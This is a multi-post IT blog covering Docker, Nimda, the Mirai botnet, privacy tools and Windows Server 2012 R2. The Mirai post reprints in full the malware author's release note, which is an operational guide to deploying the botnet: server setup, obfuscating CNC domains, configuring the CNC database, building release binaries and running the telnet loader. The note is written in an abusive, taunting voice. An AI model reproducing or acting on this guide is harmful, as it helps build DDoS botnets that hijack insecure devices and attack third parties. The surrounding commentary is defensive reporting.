Thursday, March 23, 2017

Docker is different. Docker Rules!

Docker is one of the most important software programs I have seen in my career. Forget most of what you know about VMware or KVM or XEN. Docker Datacenter on Docker Engine provides Portability, Service Discovery, Load Balancing, Security, High Performance, and Scalability.
IT is in the middle of transformation. This is driven by the desire to increase productivity, improve efficiency, and meet the rising demands of business. In this digital world, software becomes the vehicle to connect the customer to the business, and optimize the organization’s operations. Finding the right platform that improves efficiency to boost application deployment speeds and increase security and scalability while maintaining control, is crucial.

Docker is a software container platform. System administrators use Docker to run and manage apps side-by-side in isolated containers to get better compute density. Companies use Docker to build agile software delivery pipelines to ship new features faster, more securely and with confidence for both Linux and Windows Server. Developers use Docker to eliminate “works on my machine” problems when collaborating on code with co-workers.

What is a Container?

Using containers, everything required to make a piece of software run is packaged into isolated containers. Unlike VMs, containers do not bundle a full operating system - only libraries and settings required to make the software work are needed. This makes for efficient, lightweight, self-contained systems and guarantees that software will always run the same, regardless of where it’s deployed.

This  from the Docker Blog:

A natural response when first working with Docker containers is to try and compare them to virtual machines. Oftentimes we hear people describe Docker containers as “lightweight VMs”.
This is completely understandable, and many people have done the exact same thing when they first started working with Docker. It’s easy to connect those dots as both technologies share
some characteristics. Both are designed to provide an isolated environment in which to run an application. 

Additionally, in both cases that environment is represented as a binary artifact that can be moved between hosts. There may be other similarities, but these are the two biggest.

The key is that the underlying architecture is fundamentally different between the containers and virtual machines. The analog to  Docker is comparing houses (virtual machines) to apartments (Docker containers). 

Houses (the VMs) are fully self-contained and offer protection from unwanted guests. They also each possess their own infrastructure – plumbing, heating, electrical, etc. Furthermore, in the vast majority
of cases houses are all going to have at a minimum a bedroom, living area, bathroom, and kitchen. It’s incredibly difficult to ever find a “studio house” – even if one buys the smallest house they
can find, they may end up buying more than they need because that’s just how houses are built.

Apartments (Docker containers) also offer protection from unwanted guests, but they are built around shared infrastructure.  The apartment building (the server running the Docker daemon,
otherwise known as a Docker host) offers shared plumbing, heating, electrical, etc. to each apartment. Additionally apartments are offered in several different sizes – from studio to multi-bedroom
penthouse. You’re only renting exactly what you need. Docker containers share the underlying resources of the Docker host. Furthermore, developers build a Docker image that includes
exactly what they need to run their application: starting with the basics and adding in only what is needed by the application. Virtual machines are built in the opposite direction. They start
with a full operating system and, depending on the application, developers may or may not be able to strip out unwanted components.

An image is a filesystem and parameters to use at runtime. It doesn’t have state and never changes. A container is a running instance of an image. When you ran the command, Docker Engine:
checked to see if you had the software image, and if not, downloaded the image from the Docker Hub, loaded the image into the container and “ran” it. Depending on how it was built, an image might run a simple, single command and then exit. This is what hello-world did. A Docker image, though, is capable of much more. An image can start software as complex as a database, wait for you (or someone else) to add data, store the data for later use, and then wait for the next person.

Docker Engine lets people (or companies) create and share software through Docker images. Using Docker Engine, you don’t have to worry about whether your computer can run the software in a Docker image — a Docker container can always run it.

Docker Datacenter on Docker Engine includes service discovery and load balancing capabilities to aid the devops initiatives across any organization. Service discovery and load balancing make it easy for developers to create applications that can dynamically discover each other. Also, these features simplify the scaling of applications by operations engineers.

Docker Datacenter allow network and sysadmins to provide secure, scalable, and highly efficient network internally and externally through  Service Discovery and Load Balancing. Service discovery is an integral part of any distributed system and service-oriented architecture. As applications are increasingly moving towards microservices and service-oriented architectures, the operational complexity of these environments can increase. Service discovery will register the service and publish its connectivity information so that other services are aware of how to connect to the service.

Internal DNS server:

The Container Networking Model

More resources can be found at this link:

Monday, November 7, 2016

How to fix millions of vulnerable IoT devices used it the Miari DDoS attacks.

How to fix millions of vulnerable IoT devices used it the Miari DDoS attacks.

15 years ago I received the call from my friend Don Jensen. He was the head IT guy for Granite Construction, Heavy Construction division. He had four remote sites infected with the Nimda worm. 

Wikipedia sums it up here:

"Nimda is a file infecting computer worm. It quickly spread, surpassing the economic damage caused by previous outbreaks such as Code Red. Nimda utilized several types of propagation techniques and this caused it to become the Internet’s most widespread virus/worm within 22 minutes.

The worm was released on September 18, 2001. Nimda affected both user workstations (clients) running Windows 95, 98, NT, 2000 or XP and servers running Windows NT and 2000. 

The worm exploited various Microsoft IIS 4.0 / 5.0 directory traversal vulnerabilities. Nimda were hugely successful exploiting well known and long solved vulnerabilities in the Microsoft IIS server."

It was affecting all of the telephone service at the remote sites (Las Vegas, Minneapolis, Dallas, and Tampa). The phone systems were running Cisco Communication Center on top of Windows 2000 server. Microsoft Internet Information Server administration GUI was the admin control console.

What a mess. I was at my home in California, and traveling to each remote site was not possible.

This HAD to repair remotely, so I started to investigate what made Nimda tick, and found a solution. (This advisory from CERT was really helpful.)

I used it against itself. I "hacked" each of the Windows servers using the exact same security hole that made Nimda possible: I opened a browser window, plugged in the IP address of the infected server, and began typing commands, starting with "CMD.EXE".

After the massive DDoS atack in October 2016, I started to think about how to remotely patch the millions of video cameras, DVR's, and doorbells that were being compromised by Mirai and downloaded the source code. I think this just might work, but it may not be legal to remotely patch and upgrade all the IoT devices in the world. 

Monday, October 24, 2016

Mirai botnet takes down major websites with massive DDoS (Distributed Denial of Service) attack.

Mirai botnet takes down major websites with massive DDoS (Distributed Denial of Service) attack.

Last Friday, DNS provider Dyn was hit with the most powerful distributed denial of service (DDoS) attacks ever recorded, which knocked major websites offline for several hours, 

DYN provides services like CloudFlare that Internet companies use for external "cloud" hosting, DNS, load balancing,Traffic Management, and border / gateway malware protection. You can read the DYN blog here:

A DDoS attack is an Distributed DoS attack (DoS is short for denial of service). 

How to shut down major web sites like Twitter, Amazon, Tumblr, Reddit, Spotify and Netflix. 

The DDoS attack on Dyn last Friday was caused by a Mirai botnet made by tens of thousands of Internet of Things (IoT) devices, mainly because of users' failure to change default passwords on low cost IP cameras and routers. In the attack on DYN's site the hackers were able to generate over 600 gigabits per second of network traffic. Analysts have confirmed that the attack was caused by hackers using the compute power of poorly secured IP cameras, home controllers and other IoT devices to flood Dyn’s servers with data. While it has been known for some time that IP cameras are vulnerable, this is the first time we've seen this vulnerability harnessed on such a large scale with three DDoS attacks within a matter of hours, between 60,000 and 600,000 home networks connecting simultaneously formed a massive attack of 600 gigabits per second. This came from DVR's, IP cameras and other devices with the default passwords left in place after the installation. Some of these devices have software or “firmware” updates to fix security vulnerabilities that the vendor discovers. Few hardware makers do a good job of making this process simple and easy for users, or alert customers to the availability of firmware updates.

Once installed, Mirai scans the internet. When it finds targets, it attempts to login using many well-known passwords. Once Mirai finds and infects a new device, it then contacts the hacker controlling these devises. It has now become a botnet under the hacker’s control. 

Will Dormann, senior vulnerability analyst at the CERT Coordination Center (CERT/CC) adds this:

“When it comes to software updates, automatic updates are good,” Dormann said. “Simple updates that notify the user and require intervention are okay. Updates that require the user to dig around to find and install manually are next to worthless.  Devices that don’t have updates at all are completely worthless. And that can be applied to traditional computing as well.  It’s just that with IoT, you likely have less technical users at the helm.”

“Even when users are interested in and looking for this information, the vendor doesn’t always make it easy,”. He said instead of hard-coding credentials or setting default usernames and passwords that many users will never change, hardware makers should require users to pick a strong password when setting up the device.

There’s a list of just over 60 built-in usernames and passwords that the Mirai bot uses to scan for other vulnerable devices. Even this modest password dictionary is enough to find hundreds of thousands of easily-owned devices at a time.

If you own a router, IP camera or other device that has a Web interface and you haven’t yet changed the factory default credentials, you may already be part of an IoT botnet. There is no simple way to tell one way or the other whether it has been compromised. The solution to eliminating the malware infection isn’t difficult. Mirai is loaded into memory, which means it gets wiped once the infected device is disconnected from its power source. 

In September 2016, the hacker responsible for creating Mirai released the source code, effectively letting anyone build their own attack army using Mirai.

Mirai is specifically designed to exploit devices which, although relatively tiny in size and capacity, have enough computing power to send out network requests (TCP/IP packets) to another server, which is what happened here in a highly coordinated fashion.

The Mirai infrastructure is much more complex than the other various botnet variants around. The diagram above outlines the basic functionality of Mirai and its components. 

Bots (B) communicating with the Mirai C2 (C) were found scanning across TCP port 23 and port 2323 as well as performing DDoS attacks against various victims (D). Bots sent one-way traffic towards a report server (R) (, which were the IP addresses and credentials of the vulnerable hosts. This was hypothesized due to the fact that several other IP addresses (L, loaders) would communicate with IP addresses that were previously scanned and later identified as bots. This communication contained bi-directional traffic on port 23, sometimes with large packet sizes, signifying interaction with the telnet service. We observed these same victims accessing a different IP address (M) on port 80 with large packet sizes. This IP address hosted the Mirai binary itself and the large packet sizes were due to the victim downloading the malware. After downloading the binary and finishing interaction with the loader, the victim IP would begin bot activity. Throughout our investigation we identified a long-lived IP connection from a TOR exit node to the report server (R), which we believe may have been the botnet author controlling the botnet.  With the botnet established, it was being sold to various users (U) who used an API hosted on the C2 server (C) to order DDoS attacks.

After downloading and un-zipping the source code, I came across a file called "forumpost.txt" from the author of the Mirai malware. I share it with you here:

[FREE] World's Largest Net:Mirai Botnet, Client, Echo Loader, CNC source code release - Anna-senpai - 09-30-2016 11:50 AM

Greetz everybody,

When I first go in DDoS industry, I wasn't planning on staying in it long. I made my money, there's lots of eyes looking at IOT now, so it's time to GTFO. However, I know every skid and their mama, it's their wet dream to have something besides qbot.

So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping.

So, I am your senpai, and I will treat you real nice, my hf-chan.

And to everyone that thought they were doing anything by hitting my CNC, I had good laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lol

Also, shoutout to this blog post by malwaremustdie <- backup="" case="" decides="" edit="" engineer="" his="" in="" lol="" low="" posts="" quality="" reverse="" span="" to="" unixfreaxjp="">
Had a lot of respect for you, thought you were good reverser, but you really just completely and totally failed in reversing this binary. "We still have better kung fu than you kiddos" don't make me laugh please, you made so many mistakes and even confused some different binaries with my. LOL

Let me give you some slaps back -
1) port 48101 is not for back connect, it is for control to prevent multiple instances of bot running together
2) /dev/watchdog and /dev/misc are not for "making the delay", it for preventing system from hanging. This one is low-hanging fruit, so sad that you are extremely dumb
3) You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol "And doing the backdoor to connect via HTTP on". you got tripped up by signal flow ;) try harder skiddo
4) Your skeleton tool sucks ass, it thought the attack decoder was "sinden style", but it does not even use a text-based protocol? CNC and bot communicate over binary protocol
5) you say 'chroot("/") so predictable like torlus' but you don't understand, some others kill based on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland

5 slaps for you

Why are you writing reverse engineer tools? You cannot even correctly reverse in the first place. Please learn some skills first before trying to impress others. Your arrogance in declaring how you "beat me" with your dumb kung-fu statement made me laugh so hard while eating my SO had to pat me on the back.

Just as I forever be free, you will be doomed to mediocracy forever.

Bare Minimum
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading

Pro Setup (my setup)
2 VPS and 4 servers
- 1 VPS with extremely bulletproof host for database server
- 1 VPS, rootkitted, for scanReceiver and distributor
- 1 server for CNC (used like 2% CPU with 400k bots)
- 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)

Infrastructure Overview
- To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address
- Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
- Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utitlity scanListen binary appear in debug folder.

Mirai uses a spreading mechanism similar to self-rep, but what I call "real-time-load". Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.

The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections - in theory, this value lot less). I would have maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.

Configuring Bot
Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

- TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards :)
- TABLE_CNC_PORT - Port to connect to, its set to 23 already
- TABLE_SCAN_CB_DOMAIN - When finding bruted results, this domain it is reported to
- TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101 already.

In ./mirai/tools you will find something called enc.c - You must compile this to output things to put in the table.c file

Run this inside mirai directory
./ debug telnet
You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won't affect compiling the enc tool

Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:
./debug/enc string

The output should look like this
XOR'ing 20 bytes of data...

To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see "XOR'ing 20 bytes of data". This value must replace the last argument tas well. So for example, the table.c line originally looks like this

add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //

Now that we know value from enc tool, we update it like this
add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22​", 20); //

Some values are strings, some are port (uint16 in network order / big endian).

Configuring CNC
apt-get install mysql-server mysql-client
CNC requires database to work. When you install database, go into it and run following commands:

This will create database for you. To add your user,
INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, '');

Now, go into file ./mirai/cnc/main.go

Edit these values

const DatabaseAddr string   = ""
const DatabaseUser string   = "root"
const DatabasePass string   = "password"
const DatabaseTable string  = "mirai"

To the information for the mysql server you just installed

Setting Up Cross Compilers
Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.

Building CNC+Bot
The CNC, bot, and related tools:
[Image: BVc7qJs.png]


How to build bot + CNC
In mirai folder, there is script.

./ debug telnet
Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder

./ release telnet
Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: "mirai.$ARCH" to ./mirai/release folder

Building Echo Loader
Loader reads telnet entries from STDIN in following format:
ip:port user:pass
It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget. You can find code to compile the tiny downloader stub h ere

You need to edit your main.c for the dlr to include the HTTP server IP. The idea is, if the iot device doesn have tftp or wget, then it will echo load this 2kb binary, which download the real binary, since echo loading really slow.
When you compile, place your dlr.* files into the folder ./bins for the loader

Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this

cat file.txt | ./loader

Remember to ulimit!

Just so it's clear, I'm not providing any kind of 1 on 1 help tutorials or shit, too much time. All scripts and everything are included to set up working botnet in under 1 hours. I am willing to help if you have individual questions (how come CNC not connecting to database, I did this this this blah blah), but not questions like "My bot not connect, fix it"

Thursday, December 3, 2015

Net | Brain

We’ve come a long way from hand-drawn network diagrams. Advancements in diagramming software have allowed engineers to spend less time documenting their network and more time performing important network management tasks. Unfortunately, too many networks are still documented with outdated techniques.

Three Generations of Diagramming Software

Static Diagrams with Visio
Neatly drawn but cumbersome to create and update.
Static Diagrams with Auto-Discovery
Difficult to scale and overly complex to setup.
Dynamic Diagrams
Highly scalable, built on-demand, and always Up-to-date.
Dynamic Network Diagrams
Dynamic network diagram technology was designed to overcome the challenges of previous diagramming software. Dynamic diagrams are created on-demand, instantly. Because they are data-driven from the live network, they are always up-to-date. Through this approach, there’s no need to create and maintain a database of drawings.

Thursday, November 19, 2015

Don't run around naked on the Internet. Use Signal and TOR.

We should be using software that we can rely on. This doesn’t need to be an big change. It doesn’t have to be disruptive. It should be invisible, it should be something that happens effortlessly. I like apps like Signal, because they don’t require you to change your method of communications. You can use it right now. I also like TOR for a browser..

  • The first step that anyone could take is to encrypt their phone calls and their text messages. You can do that through the smartphone app Signal, by Open Whisper Systems. It’s free, and you can just download it immediately. And anybody you’re talking to now, their communications, if it’s intercepted, can’t be read by adversaries. [Signal is available for iOS andAndroid, and, unlike a lot of security tools, is very easy to use.]
  • You should encrypt your hard disk, so that if your computer is stolen the information isn’t obtainable to an adversary — pictures, where you live, where you work, where your kids are, where you go to school. [Here is a guide to encrypting your disk on Windows, Mac, and Linux.]
  • Use a password manager. One of the main things that gets people’s private information exposed, not necessarily to the most powerful adversaries, but to the most common ones, are data dumps. Your credentials may be revealed because some service you stopped using in 2007 gets hacked, and your password that you were using for that one site also works for your Gmail account. A password manager allows you to create unique passwords for every site that are unbreakable, but you don’t have the burden of memorizing them. [The password manager KeePassX is free, open source, cross-platform, and never stores anything in the cloud.]
  • The other thing there is two-factor authentication. The value of this is if someone does steal your password, or it’s left or exposed somewhere … [two-factor authentication] allows the provider to send you a secondary means of authentication — a text message or something like that. [If you enable two-factor authentication, an attacker needs both your password as the first factor and a physical device, like your phone, as your second factor, to login to your account. Gmail, Facebook, Twitter, Dropbox, GitHub,, and tons of other services all support two-factor authentication.]

Monday, November 9, 2015

Facebook face a daily fine of $269,000 for cookies that track users.

BRUSSELS —  A Brussels court had ruled that Facebook must stop within 48 hours the collection of data on users’ Internet browsing when they are not logged in. If they didn’t stop, then Facebook would face a daily fine of $269,000.

Facebook has acknowledged that it collects data on users’ Internet browsing even when they aren’t logged in, through a cookie that it places within an user's Web browser if they have visited the Facebook website. That cookie reports back to Facebook whenever that browser accesses a Web page with an active social plug-in, such as a “like” button.

Facebook says the process is necessary for security purposes to protect people from spam, malware and other attacks. The firm says it uses the information from that cookie only to weed out browsers being piloted by a machine rather than a human, and discards the browsing data after 10 days. Machine-driven browsers are often used to hack into users’ Facebook pages, the company says.

Thursday, March 12, 2015

Installing Windows Server 2012 R2 in VirtualBox

I received a call from a client that had an old server running a mission-critical database application on Windows Server 2003 that has to be replaced. Microsoft has announced end of support for Windows Server 2003 and all updates. Windows Server 2003 is at it's end-of-life. We discussed upgrading to Windows Server 2012 R2, and running the database application in a VM until we can migrate it to Windows Server 2012 R2. New hardware was purchased for this and I set about to kick Windows Server 2012 R2 around in a VM on VirtualBox. Here is a bit of what I found.

First, I download the ISO file from Microsoft and created a new VM in Oracle VirtualBox.  I added the ISO image as a second controller and let it boot from there. I selected Windows 2012 as the intended OS and left the defaults alone. It allocated 2 Gb of RAM, 2 CPU's, and a dynamic 25 Gb Virtual Disk. Video RAM was left at 128 Mb. VT-x/ AMD-V was enabled by default as well.

Windows Server 2012 R2 provides new features and capabilities: server virtualization, software-defined networking, server management and automation, web and application platform, access and information protection, virtual desktop infrastructure, and more. Windows 2012 R2 is released as several different editions for different needs. Windows Server 2012 R2 supports enterprise-grade storage, identity, networking, virtualization, and more. Windows Server 2012 R2 provides 5x more logical processor support, 4x more physical memory and 16x more memory support per virtual machine than Windows Server 2008. Microsoft includes IP Address Management (IPAM), Software Defined Networks (SDNs) o allow virtualization and network management teams to allocate network bandwidth as needed.

Windows 2012 R2 Server Essentials Edition is limited to 25 users, 50 devices, and a total of 2 VMs. Windows Server 2012 R2 Essentials Edition  (formerly Windows Small Business Server) is a server designed for small businesses. Windows Server 2012 Essentials is an ideal first server, and it can also be used as the primary server in a multi-server environment.

Microsoft adds System Center 2012 R2 with versions of Operations Manager, Virtual Machine Manager, and Configuration Manager to the standard edition of Server 2012 R2.

Microsoft has made it easy to join Windows 2012 R2 to Azure Clouds. Microsoft is supporting commonly used Linux distros as manageable guests within the Hyper-V virtualization and Azure cloud infrastructure. If organizations want a control panel, Microsoft attaches System Center Ops Manager, Virtual Machine Manager, and Configuration Manager that are deeply intertwined into the depths of Server 2012 R2 and Hyper-V. Hyper-V boots UEFI, rather than traditional BIOS. There is the capacity to move virtual machines from host to host using compression, and where hardware is available to support it, very fast transports -- 10GBE, Infiniband, and other connections. The high-speed connections are crucial to VM movements among hosts in hypervisor fabrics.

  • What's New in 802.1X Authenticated Wired Access
    This topic provides information about the new features for 802.1X Authenticated Wired Access in Windows Server 2012 R2 and Windows 8.1.
  • What's New in 802.1X Authenticated Wireless Access
    This topic provides information about the new features for 802.1X Authenticated Wireless Access in Windows Server 2012 R2 and Windows 8.1, including Miracast Wireless Display and faster Wi-Fi with 802.11ac.
  • What's New in Active Directory in Windows Server
    You can leverage new features in Active Directory to enable employees and partners to access protected corporate data from their personal devices and at the same time manage risk and govern the use of corporate resources.
  • What's New in Active Directory Domain Services (AD DS)
    Active Directory Domain Services (AD DS) in Windows Server 2012 includes new features that make it simpler and faster to deploy domain controllers (both on-premises and in the cloud), more flexible and easier to both audit and authorize access to files with Dynamic Access Control, and easier to perform administrative tasks at scale, either locally or remotely, through consistent graphical and scripted management experiences.
  • What's New in Active Directory Rights Management Services (AD RMS)
    Active Directory Rights Management Services (AD RMS) is the server role that provides you with management and development tools that work with industry security technologies—including encryption, certificates, and authentication—to help organizations create reliable information protection solutions.
  • What's New in BitLocker
    BitLocker now provides support for device encryption on x86-based and x64-based computers with a Trusted Platform Module that supports connected standby. This topic describes the new functionality. BitLocker encrypts the hard drives on your computer to provide enhanced protection against data theft or exposure on computers and removable drives that are lost or stolen.
  • What's New in BranchCache
    BranchCache in Windows Server 2012 and Windows 8 provides substantial performance, manageability, scalability, and availability improvements.
  • What's New in Certificate Services in Windows Server
    Active Directory Certificate Services in Windows Server 2012 R2 supports a policy module for the Network Device Enrollment Service, TPM key attestation, and new Windows PowerShell cmdlets for backup and restore. AD CS in Windows Server 2012 provides multiple new features and capabilities over previous versions, including new deployment, manageability, and capabilities added to AD CS in Windows Server 2012.
  • What's New in Data Deduplication in Windows Server
    Data Deduplication can now be installed on a scale-out file share and used to optimize live virtual hard disks (VHDs) for Virtual Desktop Infrastructure (VDI) workloads. This topic describes this and other new functionality.
  • What's New in DFS Replication and DFS Namespaces in Windows Server
    This topic describes the features that were added to DFS Replication (DFSR or DFS-R) in Windows Server 2012 R2. DFS Namespaces and DFS Replication in Windows Server 2012 provide new management functionality as well as interoperability with DirectAccess and Data Deduplication.
  • What's New in DHCP
    Dynamic Host Configuration Protocol (DHCP) in Windows Server 2012 R2 provides new features and capabilities over previous versions. This document describes new deployment, manageability, and capabilities added to the DHCP Server role in Windows Server 2012 R2. Dynamic Host Configuration Protocol (DHCP) is an Internet Engineering Task Force (IETF) standard designed to reduce the administration burden and complexity of configuring hosts on a TCP/IP-based network, such as a private intranet.
  • What's New in DNS Server
    This topic provides information about new and changed functionality in the DNS Server service in Windows Server 2012 R2. Domain Name System (DNS) services are used in TCP/IP networks for naming computers and network services. DNS naming locates computers and services through user-friendly names.
  • What's New in DNS Client
    This topic provides information about new and changed functionality in the DNS Client service in Windows 8.1 and Windows 8.
  • What's New in Failover Clustering in Windows Server
    This topic describes the Failover Clustering functionality that is new or changed in Windows Server 2012 R2. Failover clusters provide high availability and scalability to many server workloads. These include file share storage for server applications such as Hyper-V and Microsoft SQL Server, and server applications that run on physical servers or virtual machines.
  • New and Changed Functionality in File and Storage Services
    File and Storage Services provides a number of new management, scalability, and functionality improvements in Windows Server 2012 R2 and Windows Server 2012.
  • What's New in File Server Resource Manager in Windows Server
    This topic summarizes the File Server Resource Manager functionality in Windows Server 2012 R2 that is new or changed since Windows Server 2012. File Server Resource Manager provides a set of features that allow you to manage and classify data that is stored on file servers.
  • What's New in Group Policy in Windows Server
    This topic describes the new and changed functionality of the Group Policy feature in Windows Server 2012 R2 and Windows Server 2012. Group Policy is an infrastructure that enables you to specify managed configurations for users and computers through Group Policy settings and Group Policy Preferences.
  • What’s New in Hyper-V for Windows Server 2012 R2
    This topic describes the new and changed functionality of the Hyper-V role in Windows Server 2012 R2. The Hyper-V role enables you to create and manage a virtualized computing environment by using virtualization technology that is built in to Windows Server 2012. Hyper-V virtualizes hardware to provide an environment in which you can run multiple operating systems at the same time on one physical computer, by running each operating system in its own virtual machine.
  • What's New in Hyper-V Network Virtualization
    This topic describes the new or changed features and functionality in Hyper-V Network Virtualization in Windows Server 2012 R2.
  • What's New in Hyper-V Virtual Switch in Windows Server 2012 R2
    This topic provides information about the new features in Hyper-V Virtual Switch in Windows Server 2012 R2.
  • What's New in IPAM
    IP Address Management (IPAM) is a feature that was first introduced in Windows Server 2012 that provides highly customizable administrative and monitoring capabilities for the IP address infrastructure on a corporate network. IPAM in Windows Server 2012 R2 includes many enhancements.
  • What's New in iSCSI Target Server in Windows Server
    This topic describes the new and changed functionality of iSCSI Target Server in Windows Server 2012 R2.
  • What's New in Kerberos Authentication
    The Microsoft Windows Server operating systems implement the Kerberos version 5 authentication protocol and extensions for public key and password-based authentication. The Kerberos authentication client is implemented as a security support provider (SSP) and can be accessed through the Security Support Provider Interface (SSPI).
  • What's New for Managed Service Accounts
    Standalone Managed Service Accounts, which were introduced in Windows Server 2008 R2 and Windows 7, are managed domain accounts that provide automatic password management and simplified SPN management, including delegation of management to other administrators.
  • What's New in Networking
    This topic describes the new and changed functionality of networking in Windows Server 2012 R2. Discover new networking technologies and new features for existing technologies in Windows Server 2012. Technologies covered include BranchCache, Data Center Bridging, NIC Teaming, and more.
  • What's New in Print and Document Services in Windows Server
    This topic describes the new and changed functionality of Print and Document Services in Windows Server 2012 R2.
  • What's New in Remote Access
    A number of new Remote Access server and client features are included in Windows Server 2012 R2 and Windows 8.1.
  • What's New in Remote Desktop Services in Windows Server
    This topic describes the Remote Desktop Services functionality that is new or changed in Windows Server 2012 R2 and Windows Server 2012. The Remote Desktop Services server role provides technologies that enable users to connect to virtual desktops, RemoteApp programs, and session-based desktops. With Remote Desktop Services, users can access remote connections from within a corporate network or from the Internet.
  • Security and Protection
    This topic describes the significant changes to security technologies in Windows Server 2012 R2 and Windows Server 2012 and how those changes impact Windows 8.1.
  • What’s new in Server Manager
    In this blog post, senior Server Manager program manager Wale Martins describes the innovations and value of the new Server Manager. Server Manager in Windows Server 2012 lets administrators manage multiple, remote servers that are running Windows Server 2012, Windows Server 2008 R2, Windows Server 2008, or Windows Server 2003.
  • What's New in Smart Cards
    Smart cards and their associated personal identification numbers (PINs) are an increasingly popular, reliable, and cost-effective form of two-factor authentication. With the right controls in place, a user must have the smart card and know the PIN to gain access to network resources.
  • What's New in SMB in Windows Server
    This topic introduces the new features and functionality for Server Message Block (SMB) in Windows Server 2012 R2.
  • What's New in Storage Spaces in Windows Server
    This topic describes the features that were added to Storage Spaces in Windows Server 2012 R2, including storage tiers, write-back cache, and dual parity.
  • What's New in TLS/SSL (Schannel SSP)
    Schannel is a Security Support Provider (SSP) that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) Internet standard authentication protocols. The Security Support Provider Interface (SSPI) is an API used by Windows systems to perform security-related functions including authentication.
  • What's New in Windows Deployment Services in Windows Server
    A Windows Deployment Services (WDS) server running Windows Server 2012 R2 can be managed using the Windows PowerShell cmdlets for WDS. Using Windows PowerShell cmdlets, you can add driver packages, add client images, enable and disable boot and install images, and do many other common WDS tasks. For a full reference, see Windows PowerShell Support for Windows Server. Windows Deployment Services is a server role that enables you to remotely deploy Windows operating systems. You can use it to set up new computers by using a network-based installation.
  • What’s New in Windows PowerShell
    Windows PowerShell includes several significant features that extend its use, improve its usability, and allow you to control and manage Windows-based environments more easily and comprehensively.
  • What's New in Windows Server 2012 R2 Essentials
    This topic describes what's new and changed in Windows Server 2012 R2 Essentials. 
  • Active Directory Certificate Services Overview
    This content provides an overview of Active Directory Certificate Services (AD CS) in Windows Server 2012. AD CS is the server role that allows you to build a public key infrastructure (PKI) and provide public key cryptography, digital certificates, and digital signature capabilities for your organization.
  • Active Directory Domain Services Overview
    By using the Active Directory Domain Services (AD DS) server role, you can create a scalable, secure, and manageable infrastructure for user and resource management, and provide support for directory-enabled applications such as Microsoft Exchange Server.
  • Active Directory Federation Services Overview
    This topic provides an overview of Active Directory Federation Services (AD FS) in Windows Server 2012.
  • Active Directory Lightweight Directory Services Overview
    Active Directory Lightweight Directory Services (AD LDS) is a Lightweight Directory Access Protocol (LDAP) directory service that provides flexible support for directory-enabled applications, without the dependencies and domain-related restrictions of AD DS.
  • Active Directory Rights Management Services Overview
    This document provides an overview of Active Directory Rights Management Services (AD RMS) in Windows Server 2012. AD RMS is the server role that provides you with management and development tools that work with industry security technologies—including encryption, certificates, and authentication—to help organizations create reliable information protection solutions.
  • Application Server Overview
    Application Server provides an integrated environment for deploying and running custom, server-based business applications.
  • Desktop Experience Overview
    This topic includes information about Graphical Management Tools and Infrastructure, Server Graphical Shell, Desktop Experience, and Media Foundation.
  • Failover Clustering Overview
    This topic describes the Failover Clustering feature and provides links to additional guidance about creating, configuring, and managing failover clusters on up to 4,000 virtual machines or up to 64 physical nodes.
  • File and Storage Services Overview
    This topic discusses the File and Storage Services server role in Windows Server 2012, including what’s new, a list of role services, and where to find evaluation and deployment information.
  • Group Policy Overview
    This topic describes the Group Policy feature in Windows Server 2012 and Windows 8. Use this topic to find the documentation resources and other technical information you need to accomplish key Group Policy tasks, new or updated functionality in this version compared to previous versions of Group Policy, and ways to automate common Group Policy tasks using Windows PowerShell.
  • Hyper-V Overview
    This topic describes the Hyper-V role in Windows Server 2012—practical uses for the role, the most significant new or updated functionality in this version compared to previous versions of Hyper-V, hardware requirements, and a list of operating systems (known as guest operating systems) supported for use in a Hyper-V virtual machine.
  • Networking Overview
    This section contains detailed information about networking products and features for the IT professional to design, deploy, and maintain Windows Server 2012.
  • Network Load Balancing Overview
    By managing two or more servers as a single virtual cluster, Network Load Balancing (NLB) enhances the availability and scalability of Internet server applications such as those used on web, FTP, firewall, proxy, virtual private network (VPN), and other mission-critical servers. This topic describes the NLB feature and provides links to additional guidance about creating, configuring, and managing NLB clusters.
